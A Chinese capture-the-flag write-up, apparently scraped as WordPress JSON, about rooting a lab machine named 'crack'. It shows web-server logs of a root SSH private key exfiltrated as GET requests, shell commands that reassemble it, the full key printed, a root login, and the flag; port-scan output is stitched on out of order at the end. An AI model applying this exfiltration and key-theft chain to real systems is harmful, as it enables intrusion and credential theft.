[22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/\/RGZHTBPLVenhNmWN2fje3GDBqVeIbZwAAAMEA2dfdjpefYEgtF0GMC9Sf5UzKIEKQMzoh HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/oxY6YRERurpcyYuSa\/rxIP2uxu1yjIIcO4hpsQaoipTM0T9PS56CrO+FN9mcIcXCj5SVEq HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/2UVzu9LS0PdqPmniNmWglwvAbkktcEmbmCLYoh5GBxm9VhcL69dhzMdVe73Z9QhNXnMDlf HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/6xpD9lHWyp+ocD\/meYC7V8aio\/W9VxL25NlYwdFyCgecd\/rIJQ+tGPXoqXIKrf5lVrVtFC HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/s8IoeeQHSidUKBAAAACnJvb3RAY3JhY2s= HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/-----END HTTP\/1.1" 404 -<\/code><\/pre>\n\u6574\u7406\u4e00\u4e0b\u5f97\u5230\u6211\u4eec\u60f3\u8981\u7684\uff01\uff01\uff01\uff01\u4f46\u662f\u624b\u52a8\u641e\u592a\u6162\u4e86\uff0c\u5f53\u7136\u662f\u4ea4\u7ed9\u4e13\u4e1a\u7684\u4eba\u8fa3\uff01<\/p>\n
<\/div><\/p>\n\u7136\u540e\u624b\u52a8\u8865\u5168\u4e00\u4e0b\u6700\u524d\u9762\u7684\u548c\u6700\u540e\u9762\u7684\u5c31\u884c\u4e86\uff01<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/crack]\n\u2514\u2500$ cat log |grep -P '(?<= \/)[^ ]{20,}' -o\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAxBvRe3EH67y9jIt2rwa79tvPDwmb2WmYv8czPn4bgSCpFmhDyHwn\nb0IUyyw3iPQ3LlTYyz7qEc2vaj1xqlDgtafvvtJ2EJAJCFy5osyaqbYKgAkGkQMzOevdGt\nxNQ8NxRO4\/bC1v90lUrhyLi\/ML5B4nak+5vLFJi8NlwXMQJ\/xCWZg5+WOLduFp4VvHlwAf\ntDh2C+tJp2hqusW1jZRqSXspCfKLPt\/v7utpDTKtofxFvSS55MFciju4dIaZLZUmiqoD4k\n\/+FwJbMna8iPwmvK6n\/2bOsE1+nyKbkbvDG5pjQ3VBtK23BVnlxU4frFrbicU+VtkClfMu\nyp7muWGA1ydvYUruoOiaURYupzuxw25Rao0Sb8nW1qDBYH3BETPCypezQXE22ZYAj0ThSl\nKn2aZN\/8xWAB+\/t96TcXogtSbQw\/eyp9ecmXUpq5i1kBbFyJhAJs7x37WM3\/Cb34a\/6v8c\n9rMjGl9HMZFDwswzAGrvPOeroVB\/TpZ+UBNGE1znAAAFgC5UADIuVAAyAAAAB3NzaC1yc2\nEAAAGBAMQb0XtxB+u8vYyLdq8Gu\/bbzw8Jm9lpmL\/HMz5+G4EgqRZoQ8h8J29CFMssN4j0\nNy5U2Ms+6hHNr2o9capQ4LWn777SdhCQCQhcuaLMmqm2CoAJBpEDMznr3RrcTUPDcUTuP2\nwtb\/dJVK4ci4vzC+QeJ2pPubyxSYvDZcFzECf8QlmYOflji3bhaeFbx5cAH7Q4dgvrSado\narrFtY2Uakl7KQnyiz7f7+7raQ0yraH8Rb0kueTBXIo7uHSGmS2VJoqqA+JP\/hcCWzJ2vI\nj8Jryup\/9mzrBNfp8im5G7wxuaY0N1QbSttwVZ5cVOH6xa24nFPlbZApXzLsqe5rlhgNcn\nb2FK7qDomlEWLqc7scNuUWqNEm\/J1tagwWB9wREzwsqXs0FxNtmWAI9E4UpSp9mmTf\/MVg\nAfv7fek3F6ILUm0MP3sqfXnJl1KauYtZAWxciYQCbO8d+1jN\/wm9+Gv+r\/HPazIxpfRzGR\nQ8LMMwBq7zznq6FQf06WflATRhNc5wAAAAMBAAEAAAGAeX9uopbdvGx71wZUqo12iLOYLg\n3a87DbhP2KPw5sRe0RNSO10xEwcVq0fUfQxFXhlh\/VDN7Wr98J7b1RnZ5sCb+Y5lWH9iz2\nm6qvDDDNJZX2HWr6GX+tDhaWLt0MNY5xr64XtxLTipZxE0n2Hueel18jNldckI4aLbAKa\/\na4rL058j5AtMS6lBWFvqxZFLFr8wEECdBlGoWzkjGJkMTBsPLP8yzEnlipUxGgTR\/3uSMN\npeiKDzLI\/Y+QcQku\/7GmUIV4ugP0fjMnz\/XcXqe6GVNX\/gvNeT6WfKPCzcaXiF4I2i228u\nTB9Ga5PNU2nYzJAQcAVvDwwC4IiNsDTdQY+cSOJ0KCcs2cq59EaOoZHY6Od88900V3MKFG\nTwielzW1Nqq1ltaQYMtnILxzEeXJFp6LlqFTF4Phf\/yUyK04a6mhFg3kJzsxE+iDOVH28D\nUnj2OgO53KJ2FdLBHkUDlXMaDsISuizi0aj2MnhCryfHefhIsi1JdFyMhVuXCzNGUBAAAA\nwQDlr9NWE6q1BovNNobebvw44NdBRQE\/1nesegFqlVdtKM61gHYWJotvLV79rjjRfjnGHo\n0MoSXZXiC\/0\/CSfe6Je7unnIzhiA85jSe\/u2dIviqItTc2CBRtOZl7Vrflt7lasT7J1WAO\n1ROwaN5uL26gIgtf\/Y7Rhi0wFPN289UI2gjeVQKhXBObVm3qY7yZh8JpLPH5w0Xeuo20sP\nWchZl0D8KSZUKhlPU6Pibqmj9bAAm7hwFecuQMeS+nxg1qIGYAAADBAOZ1XurOyyH9RWIo\n0sTQ3d\/kJNgTNHAs4Y0SxSOejC+N3tEU33GU3P+ppfHYy595rX7MX4o3gqXFpAaHRIAupr\nDbenB1HQW4o6Gg+SF2GWPAQeuDbCsLM9P8XOiQIjTuCvYwHUdFD7nWMJ5Sqr6EeBV+CYw1\nTg5PIU3FsnN5D3QOHVpGNo2qAvi+4CD0BC5fxOs6cZ1RBqbJ1kanw1H6fF8nRRBds+26Bl\n\/RGZHTBPLVenhNmWN2fje3GDBqVeIbZwAAAMEA2dfdjpefYEgtF0GMC9Sf5UzKIEKQMzoh\noxY6YRERurpcyYuSa\/rxIP2uxu1yjIIcO4hpsQaoipTM0T9PS56CrO+FN9mcIcXCj5SVEq\n2UVzu9LS0PdqPmniNmWglwvAbkktcEmbmCLYoh5GBxm9VhcL69dhzMdVe73Z9QhNXnMDlf\n6xpD9lHWyp+ocD\/meYC7V8aio\/W9VxL25NlYwdFyCgecd\/rIJQ+tGPXoqXIKrf5lVrVtFC\ns8IoeeQHSidUKBAAAACnJvb3RAY3JhY2s=\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/crack]\n\u2514\u2500$ cat log |grep -P '(?<= \/)[^ ]+' -o|sed '1,2d'\n-----BEGIN\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAxBvRe3EH67y9jIt2rwa79tvPDwmb2WmYv8czPn4bgSCpFmhDyHwn\nb0IUyyw3iPQ3LlTYyz7qEc2vaj1xqlDgtafvvtJ2EJAJCFy5osyaqbYKgAkGkQMzOevdGt\nxNQ8NxRO4\/bC1v90lUrhyLi\/ML5B4nak+5vLFJi8NlwXMQJ\/xCWZg5+WOLduFp4VvHlwAf\ntDh2C+tJp2hqusW1jZRqSXspCfKLPt\/v7utpDTKtofxFvSS55MFciju4dIaZLZUmiqoD4k\n\/+FwJbMna8iPwmvK6n\/2bOsE1+nyKbkbvDG5pjQ3VBtK23BVnlxU4frFrbicU+VtkClfMu\nyp7muWGA1ydvYUruoOiaURYupzuxw25Rao0Sb8nW1qDBYH3BETPCypezQXE22ZYAj0ThSl\nKn2aZN\/8xWAB+\/t96TcXogtSbQw\/eyp9ecmXUpq5i1kBbFyJhAJs7x37WM3\/Cb34a\/6v8c\n9rMjGl9HMZFDwswzAGrvPOeroVB\/TpZ+UBNGE1znAAAFgC5UADIuVAAyAAAAB3NzaC1yc2\nEAAAGBAMQb0XtxB+u8vYyLdq8Gu\/bbzw8Jm9lpmL\/HMz5+G4EgqRZoQ8h8J29CFMssN4j0\nNy5U2Ms+6hHNr2o9capQ4LWn777SdhCQCQhcuaLMmqm2CoAJBpEDMznr3RrcTUPDcUTuP2\nwtb\/dJVK4ci4vzC+QeJ2pPubyxSYvDZcFzECf8QlmYOflji3bhaeFbx5cAH7Q4dgvrSado\narrFtY2Uakl7KQnyiz7f7+7raQ0yraH8Rb0kueTBXIo7uHSGmS2VJoqqA+JP\/hcCWzJ2vI\nj8Jryup\/9mzrBNfp8im5G7wxuaY0N1QbSttwVZ5cVOH6xa24nFPlbZApXzLsqe5rlhgNcn\nb2FK7qDomlEWLqc7scNuUWqNEm\/J1tagwWB9wREzwsqXs0FxNtmWAI9E4UpSp9mmTf\/MVg\nAfv7fek3F6ILUm0MP3sqfXnJl1KauYtZAWxciYQCbO8d+1jN\/wm9+Gv+r\/HPazIxpfRzGR\nQ8LMMwBq7zznq6FQf06WflATRhNc5wAAAAMBAAEAAAGAeX9uopbdvGx71wZUqo12iLOYLg\n3a87DbhP2KPw5sRe0RNSO10xEwcVq0fUfQxFXhlh\/VDN7Wr98J7b1RnZ5sCb+Y5lWH9iz2\nm6qvDDDNJZX2HWr6GX+tDhaWLt0MNY5xr64XtxLTipZxE0n2Hueel18jNldckI4aLbAKa\/\na4rL058j5AtMS6lBWFvqxZFLFr8wEECdBlGoWzkjGJkMTBsPLP8yzEnlipUxGgTR\/3uSMN\npeiKDzLI\/Y+QcQku\/7GmUIV4ugP0fjMnz\/XcXqe6GVNX\/gvNeT6WfKPCzcaXiF4I2i228u\nTB9Ga5PNU2nYzJAQcAVvDwwC4IiNsDTdQY+cSOJ0KCcs2cq59EaOoZHY6Od88900V3MKFG\nTwielzW1Nqq1ltaQYMtnILxzEeXJFp6LlqFTF4Phf\/yUyK04a6mhFg3kJzsxE+iDOVH28D\nUnj2OgO53KJ2FdLBHkUDlXMaDsISuizi0aj2MnhCryfHefhIsi1JdFyMhVuXCzNGUBAAAA\nwQDlr9NWE6q1BovNNobebvw44NdBRQE\/1nesegFqlVdtKM61gHYWJotvLV79rjjRfjnGHo\n0MoSXZXiC\/0\/CSfe6Je7unnIzhiA85jSe\/u2dIviqItTc2CBRtOZl7Vrflt7lasT7J1WAO\n1ROwaN5uL26gIgtf\/Y7Rhi0wFPN289UI2gjeVQKhXBObVm3qY7yZh8JpLPH5w0Xeuo20sP\nWchZl0D8KSZUKhlPU6Pibqmj9bAAm7hwFecuQMeS+nxg1qIGYAAADBAOZ1XurOyyH9RWIo\n0sTQ3d\/kJNgTNHAs4Y0SxSOejC+N3tEU33GU3P+ppfHYy595rX7MX4o3gqXFpAaHRIAupr\nDbenB1HQW4o6Gg+SF2GWPAQeuDbCsLM9P8XOiQIjTuCvYwHUdFD7nWMJ5Sqr6EeBV+CYw1\nTg5PIU3FsnN5D3QOHVpGNo2qAvi+4CD0BC5fxOs6cZ1RBqbJ1kanw1H6fF8nRRBds+26Bl\n\/RGZHTBPLVenhNmWN2fje3GDBqVeIbZwAAAMEA2dfdjpefYEgtF0GMC9Sf5UzKIEKQMzoh\noxY6YRERurpcyYuSa\/rxIP2uxu1yjIIcO4hpsQaoipTM0T9PS56CrO+FN9mcIcXCj5SVEq\n2UVzu9LS0PdqPmniNmWglwvAbkktcEmbmCLYoh5GBxm9VhcL69dhzMdVe73Z9QhNXnMDlf\n6xpD9lHWyp+ocD\/meYC7V8aio\/W9VxL25NlYwdFyCgecd\/rIJQ+tGPXoqXIKrf5lVrVtFC\ns8IoeeQHSidUKBAAAACnJvb3RAY3JhY2s=\n-----END<\/code><\/pre>\n\u8865\u5168\u4ee5\u540e\u5982\u4e0b\uff1a<\/p>\n
-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAxBvRe3EH67y9jIt2rwa79tvPDwmb2WmYv8czPn4bgSCpFmhDyHwn\nb0IUyyw3iPQ3LlTYyz7qEc2vaj1xqlDgtafvvtJ2EJAJCFy5osyaqbYKgAkGkQMzOevdGt\nxNQ8NxRO4\/bC1v90lUrhyLi\/ML5B4nak+5vLFJi8NlwXMQJ\/xCWZg5+WOLduFp4VvHlwAf\ntDh2C+tJp2hqusW1jZRqSXspCfKLPt\/v7utpDTKtofxFvSS55MFciju4dIaZLZUmiqoD4k\n\/+FwJbMna8iPwmvK6n\/2bOsE1+nyKbkbvDG5pjQ3VBtK23BVnlxU4frFrbicU+VtkClfMu\nyp7muWGA1ydvYUruoOiaURYupzuxw25Rao0Sb8nW1qDBYH3BETPCypezQXE22ZYAj0ThSl\nKn2aZN\/8xWAB+\/t96TcXogtSbQw\/eyp9ecmXUpq5i1kBbFyJhAJs7x37WM3\/Cb34a\/6v8c\n9rMjGl9HMZFDwswzAGrvPOeroVB\/TpZ+UBNGE1znAAAFgC5UADIuVAAyAAAAB3NzaC1yc2\nEAAAGBAMQb0XtxB+u8vYyLdq8Gu\/bbzw8Jm9lpmL\/HMz5+G4EgqRZoQ8h8J29CFMssN4j0\nNy5U2Ms+6hHNr2o9capQ4LWn777SdhCQCQhcuaLMmqm2CoAJBpEDMznr3RrcTUPDcUTuP2\nwtb\/dJVK4ci4vzC+QeJ2pPubyxSYvDZcFzECf8QlmYOflji3bhaeFbx5cAH7Q4dgvrSado\narrFtY2Uakl7KQnyiz7f7+7raQ0yraH8Rb0kueTBXIo7uHSGmS2VJoqqA+JP\/hcCWzJ2vI\nj8Jryup\/9mzrBNfp8im5G7wxuaY0N1QbSttwVZ5cVOH6xa24nFPlbZApXzLsqe5rlhgNcn\nb2FK7qDomlEWLqc7scNuUWqNEm\/J1tagwWB9wREzwsqXs0FxNtmWAI9E4UpSp9mmTf\/MVg\nAfv7fek3F6ILUm0MP3sqfXnJl1KauYtZAWxciYQCbO8d+1jN\/wm9+Gv+r\/HPazIxpfRzGR\nQ8LMMwBq7zznq6FQf06WflATRhNc5wAAAAMBAAEAAAGAeX9uopbdvGx71wZUqo12iLOYLg\n3a87DbhP2KPw5sRe0RNSO10xEwcVq0fUfQxFXhlh\/VDN7Wr98J7b1RnZ5sCb+Y5lWH9iz2\nm6qvDDDNJZX2HWr6GX+tDhaWLt0MNY5xr64XtxLTipZxE0n2Hueel18jNldckI4aLbAKa\/\na4rL058j5AtMS6lBWFvqxZFLFr8wEECdBlGoWzkjGJkMTBsPLP8yzEnlipUxGgTR\/3uSMN\npeiKDzLI\/Y+QcQku\/7GmUIV4ugP0fjMnz\/XcXqe6GVNX\/gvNeT6WfKPCzcaXiF4I2i228u\nTB9Ga5PNU2nYzJAQcAVvDwwC4IiNsDTdQY+cSOJ0KCcs2cq59EaOoZHY6Od88900V3MKFG\nTwielzW1Nqq1ltaQYMtnILxzEeXJFp6LlqFTF4Phf\/yUyK04a6mhFg3kJzsxE+iDOVH28D\nUnj2OgO53KJ2FdLBHkUDlXMaDsISuizi0aj2MnhCryfHefhIsi1JdFyMhVuXCzNGUBAAAA\nwQDlr9NWE6q1BovNNobebvw44NdBRQE\/1nesegFqlVdtKM61gHYWJotvLV79rjjRfjnGHo\n0MoSXZXiC\/0\/CSfe6Je7unnIzhiA85jSe\/u2dIviqItTc2CBRtOZl7Vrflt7lasT7J1WAO\n1ROwaN5uL26gIgtf\/Y7Rhi0wFPN289UI2gjeVQKhXBObVm3qY7yZh8JpLPH5w0Xeuo20sP\nWchZl0D8KSZUKhlPU6Pibqmj9bAAm7hwFecuQMeS+nxg1qIGYAAADBAOZ1XurOyyH9RWIo\n0sTQ3d\/kJNgTNHAs4Y0SxSOejC+N3tEU33GU3P+ppfHYy595rX7MX4o3gqXFpAaHRIAupr\nDbenB1HQW4o6Gg+SF2GWPAQeuDbCsLM9P8XOiQIjTuCvYwHUdFD7nWMJ5Sqr6EeBV+CYw1\nTg5PIU3FsnN5D3QOHVpGNo2qAvi+4CD0BC5fxOs6cZ1RBqbJ1kanw1H6fF8nRRBds+26Bl\n\/RGZHTBPLVenhNmWN2fje3GDBqVeIbZwAAAMEA2dfdjpefYEgtF0GMC9Sf5UzKIEKQMzoh\noxY6YRERurpcyYuSa\/rxIP2uxu1yjIIcO4hpsQaoipTM0T9PS56CrO+FN9mcIcXCj5SVEq\n2UVzu9LS0PdqPmniNmWglwvAbkktcEmbmCLYoh5GBxm9VhcL69dhzMdVe73Z9QhNXnMDlf\n6xpD9lHWyp+ocD\/meYC7V8aio\/W9VxL25NlYwdFyCgecd\/rIJQ+tGPXoqXIKrf5lVrVtFC\ns8IoeeQHSidUKBAAAACnJvb3RAY3JhY2s=\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n\u7136\u540e\u4e00\u4e3e\u62ff\u4e0broot\uff01<\/p>\n
(remote) cris@crack:\/home\/cris$ vi id_rsa\n(remote) cris@crack:\/home\/cris$ chmod 600 id_rsa\n(remote) cris@crack:\/home\/cris$ ssh root@127.0.0.1 -p 22 -i id_rsa\nThe authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.\nECDSA key fingerprint is SHA256:7z5F9pr6GN7gcEMbKUwipxWswKEpR9bMKOVzGc0V7\/s.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts.\nLinux crack 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Wed Jun 7 22:11:49 2023\nroot@crack:~# cd \/root\nroot@crack:~# ls -la\ntotal 32\ndrwx------ 5 root root 4096 abr 22 14:32 .\ndrwxr-xr-x 18 root root 4096 jun 7 2023 ..\nlrwxrwxrwx 1 root root 9 jun 7 2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 571 abr 10 2021 .bashrc\ndrwxr-xr-x 3 root root 4096 abr 22 14:32 .cache\ndrwxr-xr-x 3 root root 4096 jun 7 2023 .local\n-rw-r--r-- 1 root root 161 jul 9 2019 .profile\n-rw------- 1 root root 19 jun 7 2023 root_fl4g.txt\ndrwx------ 2 root root 4096 jun 7 2023 .ssh\nroot@crack:~# cat root_fl4g.txt \nwRt2xlFjcYqXXo4HMV<\/code><\/pre>\n\u989d\u5916\u6536\u83b7<\/h2>\nawk\u63d0\u53d6\u6570\u636e<\/h3>\n
\u6ca1\u8fc7\u51e0\u5206\u949f\u5e08\u5085\u53d1\u7684\u597d\u7406\u89e3\u7684\u7248\u672c\uff1a<\/p>\n
<\/div><\/p>\ncat log|awk '\/GET\/{print $7}'|sed 's\/^.\/\/g'<\/code><\/pre>\n\u4ecelog<\/code>\u6587\u4ef6\u4e2d\uff0c\u5bfb\u627e\u5e26\u6709GET<\/code>\u7684\u884c\uff0c\u6253\u5370\u7a7a\u767d\u5206\u5272\u7684\u7b2c\u4e03\u4e2a\u5b57\u6bb5\uff0c\u5339\u914d\u6bcf\u4e00\u884c\u7684\u7b2c\u4e00\u4e2a\u5b57\u7b26\u5e76\u5220\u9664\u3002<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/crack]\n\u2514\u2500$ cat log|awk '\/GET\/{print $7}'\n\/randomfile1\n\/frand2\n\/-----BEGIN\n\/b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\n\/NhAAAAAwEAAQAAAYEAxBvRe3EH67y9jIt2rwa79tvPDwmb2WmYv8czPn4bgSCpFmhDyHwn\n\/b0IUyyw3iPQ3LlTYyz7qEc2vaj1xqlDgtafvvtJ2EJAJCFy5osyaqbYKgAkGkQMzOevdGt\n\/xNQ8NxRO4\/bC1v90lUrhyLi\/ML5B4nak+5vLFJi8NlwXMQJ\/xCWZg5+WOLduFp4VvHlwAf\n\/tDh2C+tJp2hqusW1jZRqSXspCfKLPt\/v7utpDTKtofxFvSS55MFciju4dIaZLZUmiqoD4k\n\/\/+FwJbMna8iPwmvK6n\/2bOsE1+nyKbkbvDG5pjQ3VBtK23BVnlxU4frFrbicU+VtkClfMu\n\/yp7muWGA1ydvYUruoOiaURYupzuxw25Rao0Sb8nW1qDBYH3BETPCypezQXE22ZYAj0ThSl\n\/Kn2aZN\/8xWAB+\/t96TcXogtSbQw\/eyp9ecmXUpq5i1kBbFyJhAJs7x37WM3\/Cb34a\/6v8c\n\/9rMjGl9HMZFDwswzAGrvPOeroVB\/TpZ+UBNGE1znAAAFgC5UADIuVAAyAAAAB3NzaC1yc2\n\/EAAAGBAMQb0XtxB+u8vYyLdq8Gu\/bbzw8Jm9lpmL\/HMz5+G4EgqRZoQ8h8J29CFMssN4j0\n\/Ny5U2Ms+6hHNr2o9capQ4LWn777SdhCQCQhcuaLMmqm2CoAJBpEDMznr3RrcTUPDcUTuP2\n\/wtb\/dJVK4ci4vzC+QeJ2pPubyxSYvDZcFzECf8QlmYOflji3bhaeFbx5cAH7Q4dgvrSado\n\/arrFtY2Uakl7KQnyiz7f7+7raQ0yraH8Rb0kueTBXIo7uHSGmS2VJoqqA+JP\/hcCWzJ2vI\n\/j8Jryup\/9mzrBNfp8im5G7wxuaY0N1QbSttwVZ5cVOH6xa24nFPlbZApXzLsqe5rlhgNcn\n\/b2FK7qDomlEWLqc7scNuUWqNEm\/J1tagwWB9wREzwsqXs0FxNtmWAI9E4UpSp9mmTf\/MVg\n\/Afv7fek3F6ILUm0MP3sqfXnJl1KauYtZAWxciYQCbO8d+1jN\/wm9+Gv+r\/HPazIxpfRzGR\n\/Q8LMMwBq7zznq6FQf06WflATRhNc5wAAAAMBAAEAAAGAeX9uopbdvGx71wZUqo12iLOYLg\n\/3a87DbhP2KPw5sRe0RNSO10xEwcVq0fUfQxFXhlh\/VDN7Wr98J7b1RnZ5sCb+Y5lWH9iz2\n\/m6qvDDDNJZX2HWr6GX+tDhaWLt0MNY5xr64XtxLTipZxE0n2Hueel18jNldckI4aLbAKa\/\n\/a4rL058j5AtMS6lBWFvqxZFLFr8wEECdBlGoWzkjGJkMTBsPLP8yzEnlipUxGgTR\/3uSMN\n\/peiKDzLI\/Y+QcQku\/7GmUIV4ugP0fjMnz\/XcXqe6GVNX\/gvNeT6WfKPCzcaXiF4I2i228u\n\/TB9Ga5PNU2nYzJAQcAVvDwwC4IiNsDTdQY+cSOJ0KCcs2cq59EaOoZHY6Od88900V3MKFG\n\/TwielzW1Nqq1ltaQYMtnILxzEeXJFp6LlqFTF4Phf\/yUyK04a6mhFg3kJzsxE+iDOVH28D\n\/Unj2OgO53KJ2FdLBHkUDlXMaDsISuizi0aj2MnhCryfHefhIsi1JdFyMhVuXCzNGUBAAAA\n\/wQDlr9NWE6q1BovNNobebvw44NdBRQE\/1nesegFqlVdtKM61gHYWJotvLV79rjjRfjnGHo\n\/0MoSXZXiC\/0\/CSfe6Je7unnIzhiA85jSe\/u2dIviqItTc2CBRtOZl7Vrflt7lasT7J1WAO\n\/1ROwaN5uL26gIgtf\/Y7Rhi0wFPN289UI2gjeVQKhXBObVm3qY7yZh8JpLPH5w0Xeuo20sP\n\/WchZl0D8KSZUKhlPU6Pibqmj9bAAm7hwFecuQMeS+nxg1qIGYAAADBAOZ1XurOyyH9RWIo\n\/0sTQ3d\/kJNgTNHAs4Y0SxSOejC+N3tEU33GU3P+ppfHYy595rX7MX4o3gqXFpAaHRIAupr\n\/DbenB1HQW4o6Gg+SF2GWPAQeuDbCsLM9P8XOiQIjTuCvYwHUdFD7nWMJ5Sqr6EeBV+CYw1\n\/Tg5PIU3FsnN5D3QOHVpGNo2qAvi+4CD0BC5fxOs6cZ1RBqbJ1kanw1H6fF8nRRBds+26Bl\n\/\/RGZHTBPLVenhNmWN2fje3GDBqVeIbZwAAAMEA2dfdjpefYEgtF0GMC9Sf5UzKIEKQMzoh\n\/oxY6YRERurpcyYuSa\/rxIP2uxu1yjIIcO4hpsQaoipTM0T9PS56CrO+FN9mcIcXCj5SVEq\n\/2UVzu9LS0PdqPmniNmWglwvAbkktcEmbmCLYoh5GBxm9VhcL69dhzMdVe73Z9QhNXnMDlf\n\/6xpD9lHWyp+ocD\/meYC7V8aio\/W9VxL25NlYwdFyCgecd\/rIJQ+tGPXoqXIKrf5lVrVtFC\n\/s8IoeeQHSidUKBAAAACnJvb3RAY3JhY2s=\n\/-----END<\/code><\/pre>\ngrep -P<\/h3>\ncat log |grep -P '(?<= \/)[^ ]{20,}' -o<\/code><\/pre>\n\n(?<= \/)<\/code>\u8868\u793a\u5339\u914d\u524d\u9762\u5e26\u6709\/<\/code>\u7684<\/li>\n[^ ]{20,}<\/code>\u5339\u914d\u4efb\u4f55\u975e\u7a7a\u683c\u5b57\u7b26\u81f3\u5c1120\u6b21<\/li>\n<\/ul>\ngrep+sed<\/h3>\ncat log |grep -P '(?<= \/)[^ ]+' -o|sed '1,2d'<\/code><\/pre>\n\n(?<= \/)<\/code>\u8868\u793a\u5339\u914d\u524d\u9762\u5e26\u6709\/<\/code>\u7684<\/li>\n[^ ]+<\/code>\u5339\u914d\u4e00\u4e2a\u6216\u591a\u4e2a\u975e\u7a7a\u683c\u5b57\u7b26<\/li>\n1,2d<\/code>\u5220\u9664\u8f93\u5165\u7684\u524d\u4e24\u884c<\/li>\n<\/ul>\n\u4f18\u96c5\uff0c\u592a\u4f18\u96c5\u4e86\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"
crack \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/crack] \u2514\u2500$ rusts […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-606","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/606","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=606"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/606\/revisions"}],"predecessor-version":[{"id":607,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/606\/revisions\/607"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=606"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=606"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=606"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/crack]\n\u2514\u2500$ rustscan -a 192.168.0.102 -- -A \n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nReal hackers hack time \u231b\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.0.102:21\nOpen 192.168.0.102:4200\nOpen 192.168.0.102:12359\n[~] Starting Script(s)\n[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")\n\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-22 08:07 EDT\nNSE: Loaded 156 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 08:07\nCompleted NSE at 08:07, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 08:07\nCompleted NSE at 08:07, 0.00s elapsed\nNSE: Starting runlevel 3 (of 